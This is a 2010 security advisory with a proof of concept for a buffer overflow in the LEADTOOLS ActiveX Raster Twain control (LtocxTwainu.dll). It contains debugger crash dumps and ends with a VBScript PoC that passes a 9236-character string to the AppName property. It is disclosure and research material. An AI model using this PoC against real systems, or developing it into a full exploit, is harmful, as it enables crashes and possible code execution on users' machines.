LEADTOOLS ActiveX Raster Twain v16.5 (LtocxTwainu.dll) Remote Buffer Overflow PoC
Vendor: LEAD Technologies, Inc.
Product Web Page: http://www.leadtools.com
Affected Version: 16.5.0.2
Summary: With LEADTOOLS you can control any scanner, digital camera
or capture card that has a TWAIN (32 and 64 bit) device driver.
High-level acquisition support is included for ease of use while
low-level functionality is provided for flexibility and control in
even the most demanding scanning applications.
Desc: The Raster Twain Object Library suffers from a buffer overflow
vulnerability because it fails to check the boundry of the user input.
Tested On: Microsoft Windows XP Professional SP3 (EN)
Windows Internet Explorer 8.0.6001.18702
RFgen Mobile Development Studio 4.0.0.06 (Enterprise)
===============================================================
(2c4.2624): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00130041 ebx=100255bc ecx=01649000 edx=00183984 esi=0013ef6c edi=00000000
eip=7c912f4e esp=0013eda8 ebp=0013eda8 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
ntdll!wcscpy+0xe:
7c912f4e 668901 mov word ptr [ecx],ax ds:0023:01649000=????
0:000> g
(2c4.2624): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00410039 ebx=00410039 ecx=00150000 edx=00150608 esi=00150000 edi=00410041
eip=7c96c540 esp=0013f220 ebp=0013f228 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206
ntdll!RtlpNtMakeTemporaryKey+0x6a74:
7c96c540 807b07ff cmp byte ptr [ebx+7],0FFh ds:0023:00410040=??
==================================================================
Registers:
--------------------------------------------------
EIP 7C912F4E
EAX 00130041
EBX 100255BC -> 10014840 -> Asc: @H@H
ECX 01649000
EDX 001839DC -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EDI 00000000
ESI 0013EF6C -> BAAD0008
EBP 0013EDA8 -> 0013EDDC
ESP 0013EDA8 -> 0013EDDC
--
EIP 7C96C540
EAX 00410039
EBX 00410039
ECX 00150000 -> 000000C8
EDX 00150608 -> 7C97B5A0
EDI 00410041
ESI 00150000 -> 000000C8
EBP 0013F228 -> 0013F278
ESP 0013F220 -> 00150000
ArgDump:
--------------------------------------------------
EBP+8 016479B0 -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EBP+12 0018238C -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EBP+16 00000000
EBP+20 0013EF6C -> BAAD0008
EBP+24 100255BC -> 10014840 -> Asc: @H@H
EBP+28 0013EDB8 -> 00000000
--
EBP+8 00150000 -> 000000C8
EBP+12 00410039
EBP+16 7C96DBA4 -> Asc: RtlGetUserInfoHeap
EBP+20 00000000
EBP+24 00410041
EBP+28 7C80FF12 -> 9868146A
CompanyName LEAD Technologies, Inc.
FileDescription LEADTOOLS ActiveX Raster Twain (Win32)
FileVersion 16,5,0,2
InternalName LTRTNU
LegalCopyright © 1991-2009 LEAD Technologies, Inc.
OriginalFileName LTRTNU.DLL
ProductName LEADTOOLS® for Win32
ProductVersion 16.5.0.0
Report for Clsid: {00165752-B1BA-11CE-ABC6-F5B2E79D9E3F}
RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: False
Exception Code: ACCESS_VIOLATION
Disasm: 7C912F4E MOV [ECX],AX (ntdll.dll)
Disasm: 7C96C540 CMP BYTE PTR [EBX+7],FF (ntdll.dll)
Exception Code: BREAKPOINT
Disasm: 7C90120E INT3 (ntdll.dll)
Seh Chain:
--------------------------------------------------
1 7C839AC0 KERNEL32.dll
2 FC2950 VBSCRIPT.dll
3 7C90E900 ntdll.dll
7C912F4E MOV [ECX],AX <--- CRASH
7C96C540 CMP BYTE PTR [EBX+7],FF <--- CRASH
7C90120F RETN <--- CRASH
==================================================================
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
liquidworm gmail com
Zero Science Lab - http://www.zeroscience.mk
24.08.2010
Zero Science Lab Advisory ID: ZSL-2010-4960
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4960.php
PoC:
<object classid='clsid:00165752-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' />
<script language='vbscript'>
targetFile = "C:\Program Files\RFGen40\LtocxTwainu.dll"
prototype = "Property Let AppName As String"
memberName = "AppName"
progid = "LTRASTERTWAINLib_U.LEADRasterTwain_U"
argCount = 1
arg1=String(9236, "A")
target.AppName = arg1
</script>